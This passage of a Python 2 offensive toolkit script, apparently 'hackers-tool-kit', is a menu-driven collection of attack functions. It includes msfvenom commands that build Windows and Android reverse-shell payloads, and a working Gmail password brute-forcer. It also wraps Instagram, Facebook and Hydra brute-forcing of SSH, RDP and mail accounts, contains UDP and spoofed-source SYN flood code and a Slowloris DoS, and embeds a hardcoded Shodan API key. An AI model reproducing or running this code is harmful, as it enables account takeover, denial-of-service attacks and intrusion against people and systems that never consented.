|-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,17) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter 